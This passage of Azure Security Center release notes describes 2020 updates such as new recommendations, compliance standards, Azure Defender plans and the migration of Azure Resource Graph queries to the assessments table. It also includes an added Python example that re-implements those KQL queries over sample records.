Preview recommendations don't render a resource unhealthy, and they aren't included in the calculations of your secure score. Remediate them wherever possible, so that when the preview period ends they'll contribute towards your score. Learn more about how to respond to these recommendations in Remediate recommendations in Azure Security Center.


Security control                        New recommendations
Encrypt data in transit                 - Enforce SSL connection should be enabled for PostgreSQL database servers
                                        - Enforce SSL connection should be enabled for MySQL database servers
                                        - TLS should be updated to the latest version for your API app
                                        - TLS should be updated to the latest version for your function app
                                        - TLS should be updated to the latest version for your web app
                                        - FTPS should be required in your API App
                                        - FTPS should be required in your function App
                                        - FTPS should be required in your web App

Manage access and permissions           - Web apps should request an SSL certificate for all incoming requests
                                        - Managed identity should be used in your API App
                                        - Managed identity should be used in your function App
                                        - Managed identity should be used in your web App

Restrict unauthorized network access    - Private endpoint should be enabled for PostgreSQL servers
                                        - Private endpoint should be enabled for MariaDB servers
                                        - Private endpoint should be enabled for MySQL servers

Enable auditing and logging             - Diagnostic logs in App Services should be enabled

Implement security best practices       - Azure Backup should be enabled for virtual machines
                                        - Geo-redundant backup should be enabled for Azure Database for MariaDB
                                        - Geo-redundant backup should be enabled for Azure Database for MySQL
                                        - Geo-redundant backup should be enabled for Azure Database for PostgreSQL
                                        - PHP should be updated to the latest version for your API app
                                        - PHP should be updated to the latest version for your web app
                                        - Java should be updated to the latest version for your API app
                                        - Java should be updated to the latest version for your function app
                                        - Java should be updated to the latest version for your web app
                                        - Python should be updated to the latest version for your API app
                                        - Python should be updated to the latest version for your function app
                                        - Python should be updated to the latest version for your web app
                                        - Audit retention for SQL servers should be set to at least 90 days


Related links:

- Learn more about Azure Security Benchmark
- Learn more about Azure API apps
- Learn more about Azure function apps
- Learn more about Azure web apps
- Learn more about Azure Database for MariaDB
- Learn more about Azure Database for MySQL
- Learn more about Azure Database for PostgreSQL


NIST SP 800 171 R2 added to Security Center's regulatory 
compliance dashboard 


The NIST SP 800-171 R2 standard is now available as a built-in initiative for use with Azure Security 
Center's regulatory compliance dashboard. The mappings for the controls are described in Details of 
the NIST SP 800-171 R2 Regulatory Compliance built-in initiative. 


To apply the standard to your subscriptions and continuously monitor your compliance status, use the 
instructions in Customize the set of standards in your regulatory compliance dashboard. 


[Screenshot: the Regulatory compliance dashboard for subscription ASC DEMO. The regulatory standards compliance status lists NIST SP 800 171 R2 (2 of 23 passed controls), HIPAA HITRUST (2 of 22 passed controls), NIST SP 800 53 R4 (4 of 29 passed controls) and Azure Security Benchmark; the NIST SP 800 171 R2 tab shows its compliance controls, such as 3.1 Access Control and 3.2 Awareness and Training.]

For more information about this compliance standard, see NIST SP 800-171 R2.


Recommendations list now includes filters 


You can now filter the list of security recommendations according to a range of criteria. In the following 
example, the recommendations list has been filtered to show recommendations that: 


- are generally available (that is, not preview)
- are for storage accounts
- support quick fix remediation

[Screenshot: the filtered recommendations list, showing the Encrypt data in transit control (+3%, 2 points, 136 of 348 resources) and its recommendation "Secure transfer to storage accounts should be enabled", marked Quick Fix, with 103 of 280 storage accounts unhealthy.]


Auto provisioning experience improved and expanded 


The auto provisioning feature helps reduce management overhead by installing the required 
extensions on new - and existing - Azure VMs so they can benefit from Security Center's protections. 


As Azure Security Center grows, more extensions have been developed and Security Center can 
monitor a larger list of resource types. The auto provisioning tools have now been expanded to 
support other extensions and resource types by leveraging the capabilities of Azure Policy. 


You can now configure the auto provisioning of: 


- Log Analytics agent
- (New) Azure Policy for Kubernetes
- (New) Microsoft Dependency agent


Learn more in Auto provisioning agents and extensions from Azure Security Center. 


Secure score is now available in continuous export (preview) 


With continuous export of secure score, you can stream changes to your score in real-time to Azure 
Event Hubs or a Log Analytics workspace. Use this capability to: 


- track your secure score over time with dynamic reports
- export secure score data to Azure Sentinel (or any other SIEM)
- integrate this data with any processes you might already be using to monitor secure score in your organization


Learn more about how to Continuously export Security Center data. 


"System updates should be installed on your machines" 
recommendation now includes subrecommendations 


The System updates should be installed on your machines recommendation has been enhanced. The new version includes subrecommendations for each missing update and brings the following improvements:

- A redesigned experience in the Azure Security Center pages of the Azure portal. The recommendation details page for System updates should be installed on your machines includes the list of findings as shown below. When you select a single finding, the details pane opens with a link to the remediation information and a list of affected resources.

[Screenshot: the "System updates should be installed on your machines" recommendation page with its Security Checks list of findings (for example "2020-09 Servicing Stack Update for Windows Server 2016 for x64-based Systems (KB4576750)"), and the details pane for that finding showing its classification (Security Updates), severity (High), release date (10/13/2020), status (Unhealthy), a link to https://support.microsoft.com/kb/4576750 and the affected resources.]


- Enriched data for the recommendation from Azure Resource Graph (ARG). ARG is an Azure service that's designed to provide efficient resource exploration. You can use ARG to query at scale across a given set of subscriptions so that you can effectively govern your environment.

For Azure Security Center, you can use ARG and the Kusto Query Language (KQL) to query a wide range of security posture data.

Previously, if you queried this recommendation in ARG, the only available information was that the recommendation needs to be remediated on a machine. The following query of the enhanced version will return each missing system update grouped by machine.

Kusto

securityresources
| where type =~ "microsoft.security/assessments/subassessments"
| where extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id) == "4ab6e3c5-74dd-8b35-9ab9-f61b30875b27"
| where properties.status.code == "Unhealthy"


Policy management page in the Azure portal now shows status of 
default policy assignments 


You can now see whether or not your subscriptions have the default Security Center policy assigned, in 
the Security Center's security policy page of the Azure portal. 


[Screenshot: the Security policy page showing 61 subscriptions. The Policy Management pane lists management groups and subscriptions with a Default policy column whose values include Assigned, Not assigned and Limited permissions, and offers the tasks: view and edit the default ASC policy, add a custom policy, and add regulatory compliance standards to your compliance dashboard.]


October 2020 


Updates in October include: 


- Vulnerability assessment for on-premises and multicloud machines (preview)

- Azure Firewall recommendation added (preview)

- Authorized IP ranges should be defined on Kubernetes Services recommendation updated with quick fix

- Regulatory compliance dashboard now includes option to remove standards

- Microsoft.Security/securityStatuses table removed from Azure Resource Graph (ARG)


Vulnerability assessment for on-premises and multicloud machines 
(preview) 


Azure Defender for Servers’ integrated vulnerability assessment scanner (powered by Qualys) now 
scans Azure Arc-enabled servers. 


When you've enabled Azure Arc on your non-Azure machines, Security Center will offer to deploy the 
integrated vulnerability scanner on them - manually and at-scale. 


With this update, you can unleash the power of Azure Defender for Servers to consolidate your 
vulnerability management program across all of your Azure and non-Azure assets. 


Main capabilities: 


- Monitoring the VA (vulnerability assessment) scanner provisioning state on Azure Arc machines

- Provisioning the integrated VA agent to unprotected Windows and Linux Azure Arc machines (manually and at-scale)

- Receiving and analyzing detected vulnerabilities from deployed agents (manually and at-scale)

- Unified experience for Azure VMs and Azure Arc machines


Learn more about deploying the integrated Qualys vulnerability scanner to your hybrid machines. 


Learn more about Azure Arc-enabled servers. 


Azure Firewall recommendation added (preview) 
A new recommendation has been added to protect all your virtual networks with Azure Firewall. 


The recommendation, Virtual networks should be protected by Azure Firewall advises you to restrict 
access to your virtual networks and prevent potential threats by using Azure Firewall. 


Learn more about Azure Firewall.


Authorized IP ranges should be defined on Kubernetes Services 
recommendation updated with quick fix 


The recommendation Authorized IP ranges should be defined on Kubernetes Services now has a 
quick fix option. 


For more information about this recommendation and all other Security Center recommendations, see Security recommendations - a reference guide.

[Screenshot: the "Authorized IP ranges should be defined on Kubernetes Services" recommendation page (severity High, freshness interval 30 Min). Its description reads: "Restrict access to the Kubernetes Service Management API by granting API access only to IP addresses in specific ranges. It is recommended to limit access to authorized IP ranges to ensure that only applications from allowed networks can access the cluster." The remediation steps describe the quick fix: in the Unhealthy resources tab, select the resources and click "Remediate"; then read the remediation details in the confirmation box, insert the relevant parameters if required and approve the remediation.]


Regulatory compliance dashboard now includes option to remove 
standards 


Security Center's regulatory compliance dashboard provides insights into your compliance posture 
based on how you're meeting specific compliance controls and requirements. 


The dashboard includes a default set of regulatory standards. If any of the supplied standards isn't 
relevant to your organization, it's now a simple process to remove them from the UI for a subscription. 
Standards can be removed only at the subscription level, not at the management group scope.


Learn more in Remove a standard from your dashboard. 


Microsoft.Security/securityStatuses table removed from Azure 
Resource Graph (ARG) 


Azure Resource Graph is a service in Azure that is designed to provide efficient resource exploration with the ability to query at scale across a given set of subscriptions so that you can effectively govern your environment.

For Azure Security Center, you can use ARG and the Kusto Query Language (KQL) to query a wide range of security posture data. For example:

- Asset inventory uses ARG
- We have documented a sample ARG query for how to Identify accounts without multi-factor authentication (MFA) enabled

Within ARG, there are tables of data for you to use in your queries.


[Screenshot: Azure Resource Graph Explorer, with the securityresources table expanded to show its resource types: microsoft.security/assessments, microsoft.security/assessments/subassessments, microsoft.security/locations/alerts (Security Alerts (Preview)), microsoft.security/pricings, microsoft.security/regulatorycompliancestandards with its /regulatorycompliancecontrols and /regulatorycompliancecontrols/regulatorycomplianceassessments children, microsoft.security/securescores and microsoft.security/securescores/securescorecontrols. Other tables listed include advisorresources, alertsmanagementresources, guestconfigurationresources, maintenanceresources, resourcecontainers, resources and servicehealthresources.]


Tip

The ARG documentation lists all the available tables in Azure Resource Graph table and resource type reference.

From this update, the Microsoft.Security/securityStatuses table has been removed. The securityStatuses API is still available. As a replacement, use the Microsoft.Security/Assessments table.

The major difference between Microsoft.Security/securityStatuses and Microsoft.Security/Assessments is that while the first shows an aggregation of assessments, the second holds a single record for each.

For example, Microsoft.Security/securityStatuses would return a result with an array of two policyAssessments:


{
  id: "/subscriptions/449bc1dd-3470-4804-ab56-2752595f01ab/resourceGroups/mico-rg/providers/Microsoft.Network/virtualNetworks/mico-rg-vnet/providers/Microsoft.Security/securityStatuses/mico-rg-vnet",
  name: "mico-rg-vnet",
  type: "Microsoft.Security/securityStatuses",
  properties: {
    policyAssessments: [
      {assessmentKey: "e3de1cce-f4dd-3b34-e496-8b5381ba2d70", category: "Networking", policyName: "Azure DDOS Protection should be enabled", ...},
      {assessmentKey: "8efac66a-1ec5-be63-a824-eb28671dc527", category: "Compute", policyName: "", ...}
    ],
    securitystateByCategory: [{category: "Networking", securityState: "None"}, {category: "Compute", ...}],
    name: "GenericResourceHealthProperties",
    type: "VirtualNetwork",
    securitystate: "High"
  }
}


Whereas, Microsoft.Security/Assessments will hold a record for each such policy assessment as follows: 


{
  type: "Microsoft.Security/assessments",
  id: "/subscriptions/449bc1dd-3470-4804-ab56-2752595f01ab/resourceGroups/mico-rg/providers/Microsoft.Network/virtualNetworks/mico-rg-vnet/providers/Microsoft.Security/assessments/e3de1cce-f4dd-3b34-e496-8b5381ba2d70",
  name: "e3de1cce-f4dd-3b34-e496-8b5381ba2d70",
  properties: {
    resourceDetails: {Source: "Azure", Id: "/subscriptions/449bc1dd-3470-4804-ab56-2752595f01ab/resourceGroups/mico-rg/providers/Microsoft.Network/virtualNetworks/mico-rg-vnet"},
    displayName: "Azure DDOS Protection should be enabled",
    status: {code: "NotApplicable", cause: "VnetHasNOAppGateways", description: "There are no Application Gateway resources attached to this Virtual Network", ...}
  }
}
{
  type: "Microsoft.Security/assessments",
  id: "/subscriptions/449bc1dd-3470-4804-ab56-2752595f01ab/resourcegroups/mico-rg/providers/microsoft.network/virtualnetworks/mico-rg-vnet/providers/Microsoft.Security/assessments/8efac66a-1ec5-be63-a824-eb28671dc527",
  name: "8efac66a-1ec5-be63-a824-eb28671dc527",
  properties: {
    resourceDetails: {Source: "Azure", Id: "/subscriptions/449bc1dd-3470-4804-ab56-2752595f01ab/resourcegroups/mico-rg/providers/microsoft.network/virtualnetworks/mico-rg-vnet"},
    displayName: "Audit diagnostic setting",
    status: {code: "Unhealthy"}
  }
}


Example of converting an existing ARG query using securityStatuses to now use the assessments 
table: 


Query that references SecurityStatuses:
Kusto

SecurityResources
| where type == 'microsoft.security/securitystatuses' and properties.type == 'virtualMachine'
| where name in ({vmnames})
| project name, resourceGroup, policyAssessments = properties.policyAssessments, resourceRegion = location, id, resourceDetails = properties.resourceDetails

Replacement query for the Assessments table:
Kusto

securityresources
| where type == "microsoft.security/assessments" and id contains "virtualMachine"
| extend resourceName = extract(@"(?i)/([^/]*)/providers/Microsoft.Security/assessments", 1, id)
| extend source = tostring(properties.resourceDetails.Source)
| extend resourceId = trim(" ", tolower(tostring(case(source =~ "azure", properties.resourceDetails.Id,
    source =~ "aws", properties.additionalData.AzureResourceId,
    source =~ "gcp", properties.additionalData.AzureResourceId,
    extract("^(.+)/providers/Microsoft.Security/assessments/.+$", 1, id)))))
| extend resourceGroup = tolower(tostring(split(resourceId, "/")[4]))
| where resourceName in ({vmnames})
| project resourceName, resourceGroup, resourceRegion = location, id, resourceDetails = properties.additionalData
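To make the logic of both ARG queries on this page concrete (the sub-assessments query that groups missing system updates by machine, and the replacement query for the Assessments table above), here is an added Python example that is not part of the page and not Microsoft's code. It re-implements the queries' extract(), case() and split() steps over in-memory records. The regular expressions are the ones the queries use and the system-updates assessment key is the one quoted on the page; the subscription id, machine names, finding ids and the second assessment key are constructed placeholders.

```python
import re
from typing import Dict, List

# Assessment key of "System updates should be installed on your machines" (value quoted on the page).
SYSTEM_UPDATES_KEY = "4ab6e3c5-74dd-8b35-9ab9-f61b30875b27"

# Same patterns as the page's KQL extract() calls; "[^/]*" means "everything up to the next slash".
ASSESSMENT_KEY_RE = re.compile(r"(?i)providers/Microsoft\.Security/assessments/([^/]*)")
RESOURCE_NAME_RE = re.compile(r"(?i)/([^/]*)/providers/Microsoft\.Security/assessments")
PARENT_RESOURCE_RE = re.compile(r"^(.+)/providers/Microsoft\.Security/assessments/.+$")

def _extract(pattern, text: str) -> str:
    """KQL extract(pattern, 1, text): first capture group, or "" when nothing matches."""
    m = pattern.search(text)
    return m.group(1) if m else ""

def missing_updates_by_machine(subassessments: List[dict]) -> Dict[str, List[str]]:
    """Sub-assessments query: Unhealthy findings of the system-updates assessment, grouped by machine."""
    grouped: Dict[str, List[str]] = {}
    for rec in subassessments:
        if rec["type"].lower() != "microsoft.security/assessments/subassessments":  # KQL =~ is case-insensitive
            continue
        if _extract(ASSESSMENT_KEY_RE, rec["id"]).lower() != SYSTEM_UPDATES_KEY:
            continue
        if rec["properties"]["status"]["code"] != "Unhealthy":
            continue
        machine = _extract(RESOURCE_NAME_RE, rec["id"])  # the machine name precedes the assessments segment
        grouped.setdefault(machine, []).append(rec["properties"]["displayName"])
    return grouped

def project_assessment(rec: dict) -> dict:
    """The replacement query's extend/project steps for one assessment record."""
    rid, props = rec["id"], rec["properties"]
    details = props.get("resourceDetails", {})
    source = str(details.get("Source", "")).lower()
    if source == "azure":
        resource_id = details.get("Id", "")
    elif source in ("aws", "gcp"):
        resource_id = props.get("additionalData", {}).get("AzureResourceId", "")
    else:  # no usable Source: fall back to the parent resource path inside the record id
        resource_id = _extract(PARENT_RESOURCE_RE, rid)
    resource_id = str(resource_id).lower().strip(" ")
    parts = resource_id.split("/")  # ["", "subscriptions", <sub>, "resourcegroups", <rg>, ...]
    return {
        "resourceName": _extract(RESOURCE_NAME_RE, rid),
        "resourceGroup": parts[4] if len(parts) > 4 else "",
        "resourceId": resource_id,
        "resourceRegion": rec.get("location", ""),
        "id": rid,
        "resourceDetails": props.get("additionalData", {}),
    }

def vm_assessments(records: List[dict], vmnames: List[str]) -> List[dict]:
    """The whole replacement query: VM assessments belonging to the named machines."""
    rows = []
    for rec in records:
        # KQL 'contains' is case-insensitive, hence the lower-cased comparison; 'in' is case-sensitive.
        if rec["type"] != "microsoft.security/assessments" or "virtualmachine" not in rec["id"].lower():
            continue
        row = project_assessment(rec)
        if row["resourceName"] in vmnames:
            rows.append(row)
    return rows

# Constructed sample records: placeholder subscription id, invented machine names and finding ids.
SUB = "00000000-0000-0000-0000-000000000000"
VM_PATH = f"/subscriptions/{SUB}/resourceGroups/demo-rg/providers/Microsoft.Compute/virtualMachines/"
OTHER_KEY = "11111111-1111-1111-1111-111111111111"  # an unrelated assessment key, constructed

def _sub(vm: str, key: str, code: str, finding: str) -> dict:
    return {"type": "microsoft.security/assessments/subassessments",
            "id": f"{VM_PATH}{vm}/providers/Microsoft.Security/assessments/{key}/subassessments/{finding}",
            "properties": {"status": {"code": code}, "displayName": finding}}

def _asm(rid: str, details: dict, extra: dict) -> dict:
    return {"type": "microsoft.security/assessments", "id": rid, "location": "westeurope",
            "properties": {"resourceDetails": details, "additionalData": extra}}

SAMPLE_SUBASSESSMENTS = [
    _sub("vm1", SYSTEM_UPDATES_KEY, "Unhealthy", "KB0000001"),
    _sub("vm1", SYSTEM_UPDATES_KEY, "Unhealthy", "KB0000002"),
    _sub("vm2", SYSTEM_UPDATES_KEY, "Healthy", "KB0000001"),  # already installed: excluded
    _sub("vm2", OTHER_KEY, "Unhealthy", "unrelated"),          # different parent assessment: excluded
    _sub("vm2", SYSTEM_UPDATES_KEY, "Unhealthy", "KB0000003"),
]

SAMPLE_ASSESSMENTS = [
    _asm(f"{VM_PATH}vm1/providers/Microsoft.Security/assessments/{OTHER_KEY}",
         {"Source": "Azure", "Id": f"{VM_PATH}vm1"}, {}),
    _asm(f"{VM_PATH}aws-vm-01/providers/Microsoft.Security/assessments/{OTHER_KEY}",
         {"Source": "AWS"}, {"AzureResourceId": f"{VM_PATH}aws-vm-01"}),  # AWS-sourced record
    _asm(f"/subscriptions/{SUB}/resourceGroups/demo-rg/providers/Microsoft.Storage/storageAccounts/sa1/providers/Microsoft.Security/assessments/{OTHER_KEY}",
         {"Source": "Azure", "Id": "/not-a-vm"}, {}),  # not a virtual machine: excluded
]
```

Calling missing_updates_by_machine(SAMPLE_SUBASSESSMENTS) yields vm1 with two missing updates and vm2 with one, while the Healthy and unrelated findings drop out; vm_assessments(SAMPLE_ASSESSMENTS, ["vm1", "aws-vm-01"]) returns two rows whose resourceGroup is derived from the fifth path segment of the lower-cased resource id, exactly as split(resourceId, "/")[4] does in KQL. The AWS sample shows why the replacement query needs the case() on Source: for non-Azure machines the Azure-side id lives in additionalData.AzureResourceId rather than resourceDetails.Id.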


Learn more at the following links: 


- How to create queries with Azure Resource Graph Explorer
- Kusto Query Language (KQL)


September 2020 


Updates in September include: 


- Security Center gets a new look!

- Azure Defender released

- Azure Defender for Key Vault is generally available

- Azure Defender for Storage protection for Files and ADLS Gen2 is generally available

- Asset inventory tools are now generally available

- Disable a specific vulnerability finding for scans of container registries and virtual machines

- Exempt a resource from a recommendation

- AWS and GCP connectors in Security Center bring a multicloud experience

- Kubernetes workload protection recommendation bundle

- Vulnerability assessment findings are now available in continuous export

- Prevent security misconfigurations by enforcing recommendations when creating new resources

- Network security group recommendations improved

- Deprecated preview AKS recommendation "Pod Security Policies should be defined on Kubernetes Services"

- Email notifications from Azure Security Center improved

- Secure score doesn't include preview recommendations

- Recommendations now include a severity indicator and the freshness interval


Security Center gets a new look 


We've released a refreshed UI for Security Center's portal pages. The new pages include a new 
overview page and dashboards for secure score, asset inventory, and Azure Defender. 


The redesigned overview page now has a tile for accessing the secure score, asset inventory, and Azure 
Defender dashboards. It also has a tile linking to the regulatory compliance dashboard. 


Learn more about the overview page. 


Azure Defender released 


Azure Defender is the cloud workload protection platform (CWPP) integrated within Security Center 
for advanced, intelligent, protection of your Azure and hybrid workloads. It replaces Security Center's 
standard pricing tier option. 


When you enable Azure Defender from the Pricing and settings area of Azure Security Center, the 
following Defender plans are all enabled simultaneously and provide comprehensive defenses for the 
compute, data, and service layers of your environment: 


- Azure Defender for Servers

- Azure Defender for App Service

- Azure Defender for Storage

- Azure Defender for SQL

- Azure Defender for Key Vault

- Azure Defender for Kubernetes

- Azure Defender for container registries

Each of these plans is explained separately in the Security Center documentation.

With its dedicated dashboard, Azure Defender provides security alerts and advanced threat protection for virtual machines, SQL databases, containers, web applications, your network, and more.

Learn more about Azure Defender.


Azure Defender for Key Vault is generally available 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like certificates, 
connection strings, and passwords. 


Azure Defender for Key Vault provides Azure-native, advanced threat protection for Azure Key Vault, adding a further layer of security intelligence. By extension, it also protects many of the resources that depend on your Key Vault accounts.


The optional plan is now GA. This feature was in preview as "advanced threat protection for Azure Key 
Vault". 


Also, the Key Vault pages in the Azure portal now include a dedicated Security page for Security 
Center recommendations and alerts. 


Learn more in Azure Defender for Key Vault. 


Azure Defender for Storage protection for Files and ADLS Gen2 is generally available


Azure Defender for Storage detects potentially harmful activity on your Azure Storage accounts. Your 
data can be protected whether it's stored as blob containers, file shares, or data lakes. 


Support for Azure Files and Azure Data Lake Storage Gen2 is now generally available. 
From 1 October 2020, we'll begin charging for protecting resources on these services. 


Learn more in Azure Defender for Storage. 


Asset inventory tools are now generally available 


The asset inventory page of Azure Security Center provides a single page for viewing the security 
posture of the resources you've connected to Security Center. 


Security Center periodically analyzes the security state of your Azure resources to identify potential security vulnerabilities. It then provides you with recommendations on how to remediate those vulnerabilities. When any resource has outstanding recommendations, they'll appear in the inventory.


Learn more in Explore and manage your resources with asset inventory. 


Disable a specific vulnerability finding for scans of container 
registries and virtual machines 


Azure Defender includes vulnerability scanners to scan images in your Azure Container Registry and 


your virtual machines. 


If you have an organizational need to ignore a finding, rather than remediate it, you can optionally 
disable it. Disabled findings don't impact your secure score or generate unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it won't appear in the list of 
findings. 


This option is available from the recommendations details pages for: 


- Vulnerabilities in Azure Container Registry images should be remediated 
- Vulnerabilities in your virtual machines should be remediated 


Learn more in Disable specific findings for your container images and Disable specific findings for your 
virtual machines. 


Exempt a resource from a recommendation 


Occasionally, a resource will be listed as unhealthy regarding a specific recommendation (thereby 
lowering your secure score) even though you feel it shouldn't be. It might have been remediated by a 
process not tracked by Security Center. Or perhaps your organization has decided to accept the risk for 
that specific resource. 


In such cases, you can create an exemption rule and ensure that resource isn't listed amongst the 
unhealthy resources in the future. These rules can include documented justifications as described 
below. 


Learn more in Exempt a resource from recommendations and secure score. 


AWS and GCP connectors in Security Center bring a multicloud 
experience 


With cloud workloads commonly spanning multiple cloud platforms, cloud security services must do 
the same. 


Azure Security Center now protects workloads in Azure, Amazon Web Services (AWS), and Google 
Cloud Platform (GCP). 


Onboarding your AWS and GCP projects into Security Center integrates AWS Security Hub, GCP 
Security Command and Azure Security Center. 


Learn more in Connect your AWS accounts to Azure Security Center and Connect your GCP projects to 
Azure Security Center. 


Kubernetes workload protection recommendation bundle 


To ensure that Kubernetes workloads are secure by default, Security Center is adding Kubernetes-level 
hardening recommendations, including enforcement options with Kubernetes admission control. 


When you've installed Azure Policy for Kubernetes on your AKS cluster, every request to the 
Kubernetes API server will be monitored against the predefined set of best practices before being 
persisted to the cluster. You can then configure enforcement of the best practices and mandate them for 
future workloads. 


For example, you can mandate that privileged containers shouldn't be created, and any future requests 
to do so will be blocked. 


Learn more in Workload protection best-practices using Kubernetes admission control. 


Vulnerability assessment findings are now available in continuous 
export 


Use continuous export to stream your alerts and recommendations to Azure Event Hubs, Log Analytics 
workspaces, or Azure Monitor. From there, you can integrate this data with SIEMs (such as Azure 
Sentinel), Power BI, Azure Data Explorer, and more. 


Security Center's integrated vulnerability assessment tools return findings about your resources as 
actionable recommendations within a 'parent' recommendation such as "Vulnerabilities in your virtual 
machines should be remediated". 


The security findings are now available for export through continuous export when you select 
recommendations and enable the "Include security findings" option. 


[Screenshot: the Settings > Continuous export page of a subscription, showing the Event hub and Log Analytics workspace export targets, the Export enabled toggle, the Exported data types section (Security recommendations: all recommendations selected; Recommendation severity: no selected severities) and the Include security findings checkbox.] 


Related pages: 


- Security Center's integrated Qualys vulnerability assessment solution for Azure virtual machines 
- Security Center's integrated vulnerability assessment solution for Azure Container Registry images 
- Continuous export 


Prevent security misconfigurations by enforcing recommendations 
when creating new resources 


Security misconfigurations are a major cause of security incidents. Security Center now has the ability 
to help prevent misconfigurations of new resources with regard to specific recommendations. 


This feature can help keep your workloads secure and stabilize your secure score. 


Enforcing a secure configuration, based on a specific recommendation, is offered in two modes: 

- Using the Deny effect of Azure Policy, you can stop unhealthy resources from being created 
- Using the Enforce option, you can take advantage of Azure Policy's DeployIfNotExist effect and 
automatically remediate non-compliant resources upon creation 


This is available for selected security recommendations and can be found at the top of the resource 
details page. 


Learn more in Prevent misconfigurations with Enforce/Deny recommendations. 


Network security group recommendations improved 


The following security recommendations related to network security groups have been improved to 
reduce some instances of false positives. 


- All network ports should be restricted on NSG associated to your VM 
- Management ports should be closed on your virtual machines 
- Internet-facing virtual machines should be protected with Network Security Groups 
- Subnets should be associated with a Network Security Group 


Deprecated preview AKS recommendation "Pod Security Policies 
should be defined on Kubernetes Services" 


The preview recommendation "Pod Security Policies should be defined on Kubernetes Services" is 
being deprecated as described in the Azure Kubernetes Service documentation. 


The pod security policy (preview) feature is set for deprecation and will no longer be available after 
October 15, 2020 in favor of Azure Policy for AKS. 


After pod security policy (preview) is deprecated, you must disable the feature on any existing clusters 
using the deprecated feature to perform future cluster upgrades and stay within Azure support. 


Email notifications from Azure Security Center improved 


The following areas of the emails regarding security alerts have been improved: 

- Added the ability to send email notifications about alerts for all severity levels 
- Added the ability to notify users with different Azure roles on the subscription 
- We're proactively notifying subscription owners by default on high-severity alerts (which have a 
high probability of being genuine breaches) 
- We've removed the phone number field from the email notifications configuration page 


Learn more in Set up email notifications for security alerts. 


Secure score doesn't include preview recommendations 


Security Center continually assesses your resources, subscriptions, and organization for security issues. 
It then aggregates all the findings into a single score so that you can tell, at a glance, your current 
security situation: the higher the score, the lower the identified risk level. 


As new threats are discovered, new security advice is made available in Security Center through new 
recommendations. To avoid surprise changes to your secure score, and to provide a grace period in which 
you can explore new recommendations before they impact your scores, recommendations flagged as 
Preview are no longer included in the calculations of your secure score. They should still be 
remediated wherever possible, so that when the preview period ends they'll contribute towards your 
score. 

Also, Preview recommendations don't render a resource "Unhealthy". 


An example of a preview recommendation: 


[Screenshot: the "Remediate vulnerabilities" security control, listing preview recommendations such as "Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed", "Container images should be deployed from trusted registries only", "Kubernetes clusters should gate deployment of vulnerable images" and "Running container images should have vulnerability findings resolved", each with its status and count of affected resources.] 


Learn more about secure score. 


Recommendations now include a severity indicator and the 
freshness interval 


The details page for recommendations now includes a freshness interval indicator (whenever relevant) 
and a clear display of the severity of the recommendation. 


[Screenshot: the details page of the recommendation "Disk encryption should be applied on virtual machines", showing Severity: High and Freshness interval: 24 Hours above the Description, Remediation steps and Affected resources sections.] 


August 2020 


Updates in August include: 


- Asset inventory - powerful new view of the security posture of your assets 
- Added support for Azure Active Directory security defaults (for multi-factor authentication) 
- Service principals recommendation added 
- Vulnerability assessment on VMs - recommendations and policies consolidated 
- New AKS security policies added to ASC_default initiative — for use by private preview customers 
only 


Asset inventory - powerful new view of the security posture of your 
assets 


Security Center's asset inventory (currently in preview) provides a way to view the security posture of 
the resources you've connected to Security Center. 


Security Center periodically analyzes the security state of your Azure resources to identify potential 
security vulnerabilities. It then provides you with recommendations on how to remediate those 
vulnerabilities. When any resource has outstanding recommendations, they'll appear in the inventory. 


You can use the view and its filters to explore your security posture data and take further actions based 
on your findings. 


Learn more about asset inventory. 


Added support for Azure Active Directory security defaults (for 
multi-factor authentication) 


Security Center has added full support for security defaults, Microsoft's free identity security 
protections. 


Security defaults provide preconfigured identity security settings to defend your organization from 
common identity-related attacks. Security defaults are already protecting more than 5 million tenants 
overall; 50,000 tenants are also protected by Security Center. 


Security Center now provides a security recommendation whenever it identifies an Azure subscription 
without security defaults enabled. Until now, Security Center recommended enabling multi-factor 
authentication using conditional access, which is part of the Azure Active Directory (AD) premium 
license. For customers using Azure AD free, we now recommend enabling security defaults. 


Our goal is to encourage more customers to secure their cloud environments with MFA, and mitigate 
one of the highest risks that is also the most impactful to your secure score. 


Learn more about security defaults. 


Service principals recommendation added 


A new recommendation has been added to recommend that Security Center customers using 
management certificates to manage their subscriptions switch to service principals. 


The recommendation, Service principals should be used to protect your subscriptions instead of 
Management Certificates, advises you to use Service Principals or Azure Resource Manager to more 
securely manage your subscriptions. 


Learn more about Application and service principal objects in Azure Active Directory. 


Vulnerability assessment on VMs - recommendations and policies 
consolidated 


Security Center inspects your VMs to detect whether they're running a vulnerability assessment 
solution. If no vulnerability assessment solution is found, Security Center provides a recommendation 
to simplify the deployment. 


When vulnerabilities are found, Security Center provides a recommendation summarizing the findings 
for you to investigate and remediate as necessary. 


To ensure a consistent experience for all users, regardless of the scanner type they're using, we've 
unified four recommendations into the following two: 


Unified recommendation: A vulnerability assessment solution should be enabled on your virtual machines 
Change description: Replaces the following two recommendations: 
- Enable the built-in vulnerability assessment solution on virtual machines (powered by Qualys) (now deprecated) (Included with standard tier) 
- Vulnerability assessment solution should be installed on your virtual machines (now deprecated) (Standard and free tiers) 


Unified recommendation: Vulnerabilities in your virtual machines should be remediated 
Change description: Replaces the following two recommendations: 
- Remediate vulnerabilities found on your virtual machines (powered by Qualys) (now deprecated) 
- Vulnerabilities should be remediated by a Vulnerability Assessment solution (now deprecated) 


Now you'll use the same recommendation to deploy Security Center's vulnerability assessment 
extension or a privately licensed solution ("BYOL") from a partner such as Qualys or Rapid7. 


Also, when vulnerabilities are found and reported to Security Center, a single recommendation will 
alert you to the findings regardless of the vulnerability assessment solution that identified them. 


Updating dependencies 


If you have scripts, queries, or automations referring to the previous recommendations or policy 
keys/names, use the tables below to update the references: 


Before August 2020 


Recommendations: 
- Enable the built-in vulnerability assessment solution on virtual machines (powered by Qualys). Scope: Built-in. 
  Key: 550e890b-e652-4d22-8274-60b3bdb24c63 
- Remediate vulnerabilities found on your virtual machines (powered by Qualys). Scope: Built-in. 
  Key: 1195afff-c881-495e-9bc5-1486211ae03f 
- Vulnerability assessment solution should be installed on your virtual machines. Scope: BYOL. 
  Key: 01b1ed4c-b733-4fee-b145-f23236e70cf3 
- Vulnerabilities should be remediated by a Vulnerability Assessment solution. Scope: BYOL. 
  Key: 71992a2a-d168-42e0-b10e-6b45fa2ecddb 


Policies: 
- Vulnerability assessment should be enabled on virtual machines. Scope: Built-in. 
